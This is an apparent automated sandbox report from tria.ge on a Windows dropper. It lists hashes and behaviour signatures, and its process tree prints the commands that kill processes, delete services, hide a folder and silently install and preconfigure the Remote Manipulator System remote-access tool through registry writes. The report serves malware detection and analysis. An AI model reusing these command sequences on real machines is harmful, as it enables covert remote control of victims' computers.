Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
27/11/2022, 04:45
Static task
static1
Behavioral task
behavioral1
Sample
cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe
Resource
win7-20220812-en
General
-
Target
cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe
-
Size
3.3MB
-
MD5
3034a42900fbface754e83567cb1e8b8
-
SHA1
6538da3b999db0894615130fd300a4f2c225c108
-
SHA256
cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8
-
SHA512
28bc6dd4d9893afe881b0dd456fb361aa3b151e2f3330432a96cf7ae77c429b6d2ff7a503f62ce71a6e0d247f42aa94b36fd1f8f125548226ed5355a8ca60330
-
SSDEEP
98304:GsTpLAuoFngsWRfajfdJf+S8kvah7iy7cYiwOBpIeWH:GsTp8uoF7fdJmRkyh7iehi1zwH
Malware Config
Signatures
-
Executes dropped EXE 9 IoCs
pid Process 1940 7z.exe 1304 ses.exe 560 rutserv.exe 1284 rutserv.exe 1648 rutserv.exe 1332 rutserv.exe 1584 rfusclient.exe 1512 rfusclient.exe 1776 rfusclient.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 1724 attrib.exe -
Stops running service(s) 3 TTPs
-
Loads dropped DLL 11 IoCs
pid Process 1608 cmd.exe 1608 cmd.exe 1940 7z.exe 1608 cmd.exe 1608 cmd.exe 1608 cmd.exe 556 cmd.exe 556 cmd.exe 556 cmd.exe 1332 rutserv.exe 1332 rutserv.exe -
Drops file in Windows directory 43 IoCs
description ioc Process File created C:\Windows\spom\18699a83-4b57-44b9-bfde-b2b85b872737.tmp cmd.exe File created C:\Windows\spom\dd_wcf_CA_smci_20220812_140952_266.txt cmd.exe File created C:\Windows\spom\java_install.log cmd.exe File created C:\Windows\spom\lpksetup-20220812-142324-0.log cmd.exe File created C:\Windows\spom\RD3D4D.tmp cmd.exe File created C:\Windows\spom\3986caf0-bd86-493f-b9e1-ce2b1eb394e4.tmp cmd.exe File created C:\Windows\spom\cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe cmd.exe File created C:\Windows\spom\chrome_installer.log cmd.exe File created C:\Windows\spom\FXSAPIDebugLogFile.txt cmd.exe File created C:\Windows\spom\ASPNETSetup_00001.log cmd.exe File created C:\Windows\spom\dd_vcredistMSI6466.txt cmd.exe File created C:\Windows\spom\lpksetup-20220812-142614-0.log cmd.exe File created C:\Windows\spom\RGID01C.tmp cmd.exe File created C:\Windows\spom\ses.exe cmd.exe File created C:\Windows\spom\dd_wcf_CA_smci_20220812_140953_935.txt cmd.exe File created C:\Windows\spom\JavaDeployReg.log cmd.exe File created C:\Windows\spom\ose00000.exe cmd.exe File created C:\Windows\spom\wmsetup.log cmd.exe File created C:\Windows\spom\dd_SetupUtility.txt cmd.exe File created C:\Windows\spom\dd_vcredistUI6407.txt cmd.exe File created C:\Windows\spom\Microsoft .NET Framework 4.7.2 Setup_20220812_140937181-MSI_netfx_Full_x64.msi.txt cmd.exe File created C:\Windows\spom\rfusclient.exe cmd.exe File created C:\Windows\spom\RGID01C.tmp-tmp cmd.exe File created C:\Windows\spom\SetupExe(202208121416244B4).log cmd.exe File created C:\Windows\spom\rutserv.exe cmd.exe File created C:\Windows\spom\c205eaa7-5a63-4b1a-b0c0-d53a66d519f7.tmp cmd.exe File created C:\Windows\spom\d8667315-09fb-47ef-835f-3a194f2a9bbf.tmp cmd.exe File created C:\Windows\spom\dd_vcredistUI6466.txt cmd.exe File created C:\Windows\spom\jawshtml.html cmd.exe File created C:\Windows\spom\jusched.log cmd.exe File created C:\Windows\spom\Microsoft .NET Framework 4.7.2 Setup_20220812_140937181.html cmd.exe File created C:\Windows\spom\ASPNETSetup_00000.log cmd.exe File created C:\Windows\spom\e67f403f-a7b8-407a-b1da-a644ca8862ae.tmp cmd.exe File created C:\Windows\spom\lpksetup-20220812-143535-0.log cmd.exe File created C:\Windows\spom\java_install_reg.log cmd.exe File created C:\Windows\spom\lpksetup-20220812-142918-0.log cmd.exe File created C:\Windows\spom\588e55d7-fe91-4bb6-b0fa-9e8aa46775d9.tmp cmd.exe File created C:\Windows\spom\85268142-14ac-43d9-82ae-7929db33f992.tmp cmd.exe File created C:\Windows\spom\Admin.bmp cmd.exe File created C:\Windows\spom\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt cmd.exe File created C:\Windows\spom\dd_vcredistMSI6407.txt cmd.exe File created C:\Windows\spom\f58a5d9e-148a-48de-8220-0cbbefe7cc39.tmp cmd.exe File created C:\Windows\spom\lpksetup-20220812-143231-0.log cmd.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1288 sc.exe 1960 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 2 IoCs
pid Process 748 taskkill.exe 532 taskkill.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process 560 rutserv.exe 560 rutserv.exe 560 rutserv.exe 560 rutserv.exe 1284 rutserv.exe 1284 rutserv.exe 1648 rutserv.exe 1648 rutserv.exe 1332 rutserv.exe 1332 rutserv.exe 1332 rutserv.exe 1332 rutserv.exe 1584 rfusclient.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
pid Process 1776 rfusclient.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 748 taskkill.exe Token: SeDebugPrivilege 532 taskkill.exe Token: SeDebugPrivilege 560 rutserv.exe Token: SeDebugPrivilege 1648 rutserv.exe Token: SeTakeOwnershipPrivilege 1332 rutserv.exe Token: SeTcbPrivilege 1332 rutserv.exe Token: SeTcbPrivilege 1332 rutserv.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1752 wrote to memory of 1608 1752 cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe 28 PID 1752 wrote to memory of 1608 1752 cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe 28 PID 1752 wrote to memory of 1608 1752 cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe 28 PID 1752 wrote to memory of 1608 1752 cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe 28 PID 1608 wrote to memory of 1940 1608 cmd.exe 30 PID 1608 wrote to memory of 1940 1608 cmd.exe 30 PID 1608 wrote to memory of 1940 1608 cmd.exe 30 PID 1608 wrote to memory of 1940 1608 cmd.exe 30 PID 1608 wrote to memory of 1304 1608 cmd.exe 31 PID 1608 wrote to memory of 1304 1608 cmd.exe 31 PID 1608 wrote to memory of 1304 1608 cmd.exe 31 PID 1608 wrote to memory of 1304 1608 cmd.exe 31 PID 1304 wrote to memory of 556 1304 ses.exe 32 PID 1304 wrote to memory of 556 1304 ses.exe 32 PID 1304 wrote to memory of 556 1304 ses.exe 32 PID 1304 wrote to memory of 556 1304 ses.exe 32 PID 556 wrote to memory of 748 556 cmd.exe 34 PID 556 wrote to memory of 748 556 cmd.exe 34 PID 556 wrote to memory of 748 556 cmd.exe 34 PID 556 wrote to memory of 748 556 cmd.exe 34 PID 556 wrote to memory of 532 556 cmd.exe 36 PID 556 wrote to memory of 532 556 cmd.exe 36 PID 556 wrote to memory of 532 556 cmd.exe 36 PID 556 wrote to memory of 532 556 cmd.exe 36 PID 556 wrote to memory of 632 556 cmd.exe 37 PID 556 wrote to memory of 632 556 cmd.exe 37 PID 556 wrote to memory of 632 556 cmd.exe 37 PID 556 wrote to memory of 632 556 cmd.exe 37 PID 632 wrote to memory of 328 632 net.exe 38 PID 632 wrote to memory of 328 632 net.exe 38 PID 632 wrote to memory of 328 632 net.exe 38 PID 632 wrote to memory of 328 632 net.exe 38 PID 556 wrote to memory of 1408 556 cmd.exe 39 PID 556 wrote to memory of 1408 556 cmd.exe 39 PID 556 wrote to memory of 1408 556 cmd.exe 39 PID 556 wrote to memory of 1408 556 cmd.exe 39 PID 1408 wrote to memory of 1860 1408 net.exe 40 PID 1408 wrote to memory of 1860 1408 net.exe 40 PID 1408 wrote to memory of 1860 1408 net.exe 40 PID 1408 wrote to memory of 1860 1408 net.exe 40 PID 556 wrote to memory of 1288 556 cmd.exe 41 PID 556 wrote to memory of 1288 556 cmd.exe 41 PID 556 wrote to memory of 1288 556 cmd.exe 41 PID 556 wrote to memory of 1288 556 cmd.exe 41 PID 556 wrote to memory of 1960 556 cmd.exe 42 PID 556 wrote to memory of 1960 556 cmd.exe 42 PID 556 wrote to memory of 1960 556 cmd.exe 42 PID 556 wrote to memory of 1960 556 cmd.exe 42 PID 556 wrote to memory of 1828 556 cmd.exe 43 PID 556 wrote to memory of 1828 556 cmd.exe 43 PID 556 wrote to memory of 1828 556 cmd.exe 43 PID 556 wrote to memory of 1828 556 cmd.exe 43 PID 556 wrote to memory of 1724 556 cmd.exe 44 PID 556 wrote to memory of 1724 556 cmd.exe 44 PID 556 wrote to memory of 1724 556 cmd.exe 44 PID 556 wrote to memory of 1724 556 cmd.exe 44 PID 556 wrote to memory of 560 556 cmd.exe 45 PID 556 wrote to memory of 560 556 cmd.exe 45 PID 556 wrote to memory of 560 556 cmd.exe 45 PID 556 wrote to memory of 560 556 cmd.exe 45 PID 556 wrote to memory of 1284 556 cmd.exe 46 PID 556 wrote to memory of 1284 556 cmd.exe 46 PID 556 wrote to memory of 1284 556 cmd.exe 46 PID 556 wrote to memory of 1284 556 cmd.exe 46 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1724 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe"C:\Users\Admin\AppData\Local\Temp\cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\F529.tmp\new.bat" "2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Users\Admin\AppData\Local\Temp\F529.tmp\7z.exe7z x -psystem32.dll Sys.7z -oC:\Users\Admin\AppData\Local\Temp -y3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1940
-
-
C:\Users\Admin\AppData\Local\Temp\ses.exe"C:\Users\Admin\AppData\Local\Temp\ses.exe" -p3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1304 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FB9E.tmp\15971.bat" -p "4⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:556 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im rfusclient.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:748
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im rutserv.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:532
-
-
C:\Windows\SysWOW64\net.exenet stop netaservice5⤵
- Suspicious use of WriteProcessMemory
PID:632 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop netaservice6⤵PID:328
-
-
-
C:\Windows\SysWOW64\net.exenet stop rmanservice5⤵
- Suspicious use of WriteProcessMemory
PID:1408 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop rmanservice6⤵PID:1860
-
-
-
C:\Windows\SysWOW64\sc.exesc delete netaservice5⤵
- Launches sc.exe
PID:1288
-
-
C:\Windows\SysWOW64\sc.exesc delete rmanservice5⤵
- Launches sc.exe
PID:1960
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\SYSTEM\Remote Manipulator System" /f5⤵PID:1828
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Windows\spom"5⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1724
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"rutserv.exe" /silentinstall5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:560
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"rutserv.exe" /firewall5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1284
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "notification" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e002000760065007200730069006f006e003d0022003500360030003000360022003e003c007500730065003e0074007200750065003c002f007500730065003e003c0065006d00610069006c003e0070006c0075007400750073003100320033004000790061006e006400650078002e00720075003c002f0065006d00610069006c003e003c00690064003e007b00420044003600330046003600340038002d0043004300360043002d0034004200430033002d0041003100390046002d003800420041004400450045004200300030003700390033007d003c002f00690064003e003c00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e00660061006c00730065003c002f00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e003c00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e00660061006c00730065003c002f00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e003c00730065006e0074003e00660061006c00730065003c002f00730065006e0074003e003c00760065007200730069006f006e003e00350036003000300036003c002f00760065007200730069006f006e003e003c007000750062006c00690063005f006b00650079005f006d003e003c002f007000750062006c00690063005f006b00650079005f006d003e003c007000750062006c00690063005f006b00650079005f0065003e003c002f007000750062006c00690063005f006b00650079005f0065003e003c00700061007300730077006f00720064003e003c002f00700061007300730077006f00720064003e003c0069006e007400650072006e00650074005f00690064003e003c002f0069006e007400650072006e00650074005f00690064003e003c0064006900730063006c00610069006d00650072003e003c002f0064006900730063006c00610069006d00650072003e003c002f0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e003e000d000a005⤵PID:1080
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "UserAccess" /t REG_BINARY /d5⤵PID:1276
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Password" /t REG_BINARY /d 380039004400430041004600430035004600420039004500440042003800410038003700300034003500330036003900330033003500370037003400300038004400310037004100360035003900360034003900330038004600330041003400350034003800360032003700300031003100370046004200360033003900410037003500430043003100390044003600460034003800300030004600300037003200370039003700360042003700300043004200410038003400370037003900340039003000340036004500330034003600340036003500300043004300450041004100450038003900460041004300300035003900370046003900320034005⤵PID:1984
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "InternetId" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d00310036004c00450022003f003e000d000a003c0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073002000760065007200730069006f006e003d0022003500360030003000360022003e003c0069006e007400650072006e00650074005f00690064003e003c002f0069006e007400650072006e00650074005f00690064003e003c007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e00660061006c00730065003c002f007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e003c0069006e00650074005f007300650072007600650072003e003c002f0069006e00650074005f007300650072007600650072003e003c007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e00660061006c00730065003c002f007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e003c0069006e00650074005f00690064005f0070006f00720074003e0035003600350035003c002f0069006e00650074005f00690064005f0070006f00720074003e003c007500730065005f0069006e00650074005f00690064005f0069007000760036003e00660061006c00730065003c002f007500730065005f0069006e00650074005f00690064005f0069007000760036003e003c002f0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073003e000d000a005⤵PID:1116
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Options" /t REG_BINARY /d 545046301154524f4d5365727665724f7074696f6e7300095573654e5441757468080d53656375726974794c6576656c020304506f727403121614456e61626c654f7665726c617943617074757265080c53686f775472617949636f6e080642696e644950060d416e7920696e746572666163651343616c6c6261636b4175746f436f6e6e656374091743616c6c6261636b436f6e6e656374496e74657276616c023c084869646553746f70080c497046696c7465725479706502021750726f7465637443616c6c6261636b53657474696e6773081550726f74656374496e6574496453657474696e6773080f446f4e6f7443617074757265524450080755736549507636091141736b557365725065726d697373696f6e0816557365725065726d697373696f6e496e74657276616c031027134175746f416c6c6f775065726d697373696f6e08134e656564417574686f72697479536572766572081f41736b5065726d697373696f6e4f6e6c794966557365724c6f676765644f6e0811557365496e6574436f6e6e656374696f6e0813557365437573746f6d496e6574536572766572080a496e65744964506f727402000d557365496e6574496449507636081444697361626c6552656d6f7465436f6e74726f6c081344697361626c6552656d6f746553637265656e081344697361626c6546696c655472616e73666572080f44697361626c655265646972656374080d44697361626c6554656c6e6574081444697361626c6552656d6f746545786563757465081244697361626c655461736b4d616e61676572080e44697361626c654f7665726c6179080f44697361626c6553687574646f776e081444697361626c6552656d6f746555706772616465081544697361626c655072657669657743617074757265081444697361626c654465766963654d616e61676572080b44697361626c6543686174081344697361626c6553637265656e5265636f7264081044697361626c65415643617074757265081244697361626c6553656e644d657373616765080f44697361626c655265676973747279080d44697361626c65415643686174081544697361626c6552656d6f746553657474696e6773081544697361626c6552656d6f74655072696e74696e67080a44697361626c65526470080f4e6f7469667953686f7750616e656c08144e6f746966794368616e67655472617949636f6e08104e6f7469667942616c6c6f6e48696e74080f4e6f74696679506c6179536f756e64080c4e6f7469667950616e656c5802ff0c4e6f7469667950616e656c5902ff064c6f6755736509055369644964061034313936322e37343233343034353134084c6963656e73657306ae524d532d462d31393738444135303863433339363536326343663341363644613832323265446269593253326459586c52664477776e4932314758554a4544683945586d78785030594756304a5856513066506a6c74446c465644676f424167526c645738645556554f446c5246446d463966674d494841494341514a76593370704167304c4177734d486c516d63323952566b554f41677765557a773562513458576c564c623168654e434a740d50726f787953657474696e67731428010000efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d31364c45223f3e0d0a3c70726f78795f73657474696e67732076657273696f6e3d223536303036223e3c7573655f70726f78793e66616c73653c2f7573655f70726f78793e3c70726f78795f747970653e303c2f70726f78795f747970653e3c686f73743e3c2f686f73743e3c706f72743e383038303c2f706f72743e3c6e6565645f617574683e66616c73653c2f6e6565645f617574683e3c6e746d6c5f617574683e66616c73653c2f6e746d6c5f617574683e3c757365726e616d653e3c2f757365726e616d653e3c70617373776f72643e3c2f70617373776f72643e3c646f6d61696e3e3c2f646f6d61696e3e3c2f70726f78795f73657474696e67733e0d0a1144697361626c65496e7465726e65744964080b536166654d6f64655365740800005⤵PID:1816
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "FUSClientPath" /t REG_SZ /d "C:\Program Files\Remote Manipulator System - Host\rfusclient.exe"5⤵PID:276
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "CalendarRecordSettings" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e002000760065007200730069006f006e003d0022003500360030003000360022003e003c006d00610069006e005f006f007000740069006f006e0073003e003c006100630074006900760065003e00660061006c00730065003c002f006100630074006900760065003e003c0069006e00740065007200760061006c005f00730068006f0074003e00360030003c002f0069006e00740065007200760061006c005f00730068006f0074003e003c00700072006f0074006500630074005f007200650063006f00720064003e00660061006c00730065003c002f00700072006f0074006500630074005f007200650063006f00720064003e003c0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e00390030003c002f0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e003c007300630061006c0065005f007100750061006c006900740079003e003100300030003c002f007300630061006c0065005f007100750061006c006900740079003e003c0063006f006d007000720065007300730069006f006e005f0074007900700065003e0030003c002f0063006f006d007000720065007300730069006f006e005f0074007900700065003e003c006d00610078005f00660069006c0065005f00730069007a0065003e003100300030003c002f006d00610078005f00660069006c0065005f00730069007a0065003e003c006100750074006f005f0063006c006500610072003e00660061006c00730065003c002f006100750074006f005f0063006c006500610072003e003c006100750074006f005f0063006c006500610072005f0064006100790073003e0030003c002f006100750074006f005f0063006c006500610072005f0064006100790073003e003c0075007300650064005f00660069006c0065005f006c0069006d00690074003e0074007200750065003c002f0075007300650064005f00660069006c0065005f006c0069006d00690074003e003c0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e0031003000300030003c002f0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e003c0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e0074007200750065003c002f0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e003c002f006d00610069006e005f006f007000740069006f006e0073003e003c007300630068006500640075006c00650073002f003e003c002f0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e003e000d000a005⤵PID:624
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"rutserv.exe" /start5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1648
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exeC:\Users\Admin\AppData\Local\Temp\rutserv.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1332 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1584 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray3⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:1776
-
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵
- Executes dropped EXE
PID:1512
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
893KB
MD504ad4b80880b32c94be8d0886482c774
SHA1344faf61c3eb76f4a2fb6452e83ed16c9cce73e0
SHA256a1e1d1f0fff4fcccfbdfa313f3bdfea4d3dfe2c2d9174a615bbc39a0a6929338
SHA5123e3aaf01b769471b18126e443a721c9e9a0269e9f5e48d0a10251bc1ee309855bd71ede266caa6828b007359b21ba562c2a5a3469078760f564fb7bd43acabfb
-
Filesize
160KB
MD5a51d90f2f9394f5ea0a3acae3bd2b219
SHA120fea1314dbed552d5fedee096e2050369172ee1
SHA256ac9674feb8f2fad20c1e046de67f899419276ae79a60e8cc021a4bf472ae044f
SHA512c11f981136db7d9bde01046b1953fd924ff29447d41257da09dd762451e27390cea9b69e43206a8fff825ebcd4ddec5a6247bb502aefbd6e8285622caa985bf6
-
Filesize
160KB
MD5a51d90f2f9394f5ea0a3acae3bd2b219
SHA120fea1314dbed552d5fedee096e2050369172ee1
SHA256ac9674feb8f2fad20c1e046de67f899419276ae79a60e8cc021a4bf472ae044f
SHA512c11f981136db7d9bde01046b1953fd924ff29447d41257da09dd762451e27390cea9b69e43206a8fff825ebcd4ddec5a6247bb502aefbd6e8285622caa985bf6
-
Filesize
2.2MB
MD5be88b8b3ce26e220162b65029b3f0b38
SHA1468389733444173e91f2ac208d500deed637a241
SHA256502b5953ebbe874002969c68d581cdb83dcf2fc4e83cc4a6f9637a0b486ed4b5
SHA51236f268fa91244da34148803896a989d385bb7a0bfafe2908ca326e8f099d69791d5a32fa6b6b8ef0427adf7c128c844b6c79c246df7638e81afb7693f2784dcb
-
Filesize
65B
MD513310849fd8d70c608fd7b02fa86eea5
SHA19e79bc5cc474fefbe6ec40f8403ba74bb271f393
SHA25603d09ae50ba37137bb7aa3a3290224a5e91d482b933a839a75797ea5c23e9b42
SHA512909a92f88da3d2ac6464e2c616976dae2d1ce97d01925473cf3e93a364a4bdc646d9d95412aff95876e614163447420faa68cf3bac33fed6d7220b195e838c30
-
Filesize
10KB
MD564736420a3b8c3061f89d2bdac26465c
SHA1306f8e23b6c979e863cca7f238dd229543e40b35
SHA256ee83c47bbf15ba057fcd6beb952fb902b38dcab7f7465e6f4f6be533ef2cc119
SHA5129983348bbbabefe96db162970d1f5bcd7055c9f975abb00d06b3784a586a59229dbd6a9cf97400cba9ce1e56fab219fa5840d0fe7b1d0f3de7784c3b4e574add
-
Filesize
4.8MB
MD571abd0cadb18ddcb92a4dc990a29824b
SHA1d640ecac5ef9db4a642357a5b187c778798a9459
SHA256e91a657f6a87fb9be6f57c7c4097fdfa23e353a23caeb03c18987e718567b605
SHA51251c38a9611cb36e60021c7f473893c5d608bce7ee9f482574b4657fb52cc5e1dcc41ef207e5d3a8570d886ca6611c72351d72cb7d7b0f02a606114add7c94a8a
-
Filesize
4.8MB
MD571abd0cadb18ddcb92a4dc990a29824b
SHA1d640ecac5ef9db4a642357a5b187c778798a9459
SHA256e91a657f6a87fb9be6f57c7c4097fdfa23e353a23caeb03c18987e718567b605
SHA51251c38a9611cb36e60021c7f473893c5d608bce7ee9f482574b4657fb52cc5e1dcc41ef207e5d3a8570d886ca6611c72351d72cb7d7b0f02a606114add7c94a8a
-
Filesize
4.8MB
MD571abd0cadb18ddcb92a4dc990a29824b
SHA1d640ecac5ef9db4a642357a5b187c778798a9459
SHA256e91a657f6a87fb9be6f57c7c4097fdfa23e353a23caeb03c18987e718567b605
SHA51251c38a9611cb36e60021c7f473893c5d608bce7ee9f482574b4657fb52cc5e1dcc41ef207e5d3a8570d886ca6611c72351d72cb7d7b0f02a606114add7c94a8a
-
Filesize
4.8MB
MD571abd0cadb18ddcb92a4dc990a29824b
SHA1d640ecac5ef9db4a642357a5b187c778798a9459
SHA256e91a657f6a87fb9be6f57c7c4097fdfa23e353a23caeb03c18987e718567b605
SHA51251c38a9611cb36e60021c7f473893c5d608bce7ee9f482574b4657fb52cc5e1dcc41ef207e5d3a8570d886ca6611c72351d72cb7d7b0f02a606114add7c94a8a
-
Filesize
5.8MB
MD59a9cad56988e3c52f154187752ef453e
SHA10f9cf3a9cf3d030694179437df7502937cc15cff
SHA256e5012d6b2bd849ae649114175d012b5ee17992286879be7963446f9e577a8161
SHA5122dffc1208bb18e18024c21dc03e7edadd12a30b16fe5677583ec7e3203f758de96ff2598ef1a937fea05f6ca746a81c8a74f37fe30e50450e71aa4bfe6e334f0
-
Filesize
5.8MB
MD59a9cad56988e3c52f154187752ef453e
SHA10f9cf3a9cf3d030694179437df7502937cc15cff
SHA256e5012d6b2bd849ae649114175d012b5ee17992286879be7963446f9e577a8161
SHA5122dffc1208bb18e18024c21dc03e7edadd12a30b16fe5677583ec7e3203f758de96ff2598ef1a937fea05f6ca746a81c8a74f37fe30e50450e71aa4bfe6e334f0
-
Filesize
5.8MB
MD59a9cad56988e3c52f154187752ef453e
SHA10f9cf3a9cf3d030694179437df7502937cc15cff
SHA256e5012d6b2bd849ae649114175d012b5ee17992286879be7963446f9e577a8161
SHA5122dffc1208bb18e18024c21dc03e7edadd12a30b16fe5677583ec7e3203f758de96ff2598ef1a937fea05f6ca746a81c8a74f37fe30e50450e71aa4bfe6e334f0
-
Filesize
5.8MB
MD59a9cad56988e3c52f154187752ef453e
SHA10f9cf3a9cf3d030694179437df7502937cc15cff
SHA256e5012d6b2bd849ae649114175d012b5ee17992286879be7963446f9e577a8161
SHA5122dffc1208bb18e18024c21dc03e7edadd12a30b16fe5677583ec7e3203f758de96ff2598ef1a937fea05f6ca746a81c8a74f37fe30e50450e71aa4bfe6e334f0
-
Filesize
5.8MB
MD59a9cad56988e3c52f154187752ef453e
SHA10f9cf3a9cf3d030694179437df7502937cc15cff
SHA256e5012d6b2bd849ae649114175d012b5ee17992286879be7963446f9e577a8161
SHA5122dffc1208bb18e18024c21dc03e7edadd12a30b16fe5677583ec7e3203f758de96ff2598ef1a937fea05f6ca746a81c8a74f37fe30e50450e71aa4bfe6e334f0
-
Filesize
46KB
MD5771c4d6a2b4419d6598ec589a54212f5
SHA1445f2be41589b527f643b09bf6a86ba88fd00b95
SHA256942b7cd79bcc4e143ea1314f8439c915b5c04dc0034e89dd4f6204ab54555226
SHA512f1e113ae1f4d08a11110a271c63acc326810739b7e943e938915f016615543ba920cdb6100418a554c16b71fd204c284fe395b5345fa42f2baf8e7bae11d00e8
-
Filesize
46KB
MD5771c4d6a2b4419d6598ec589a54212f5
SHA1445f2be41589b527f643b09bf6a86ba88fd00b95
SHA256942b7cd79bcc4e143ea1314f8439c915b5c04dc0034e89dd4f6204ab54555226
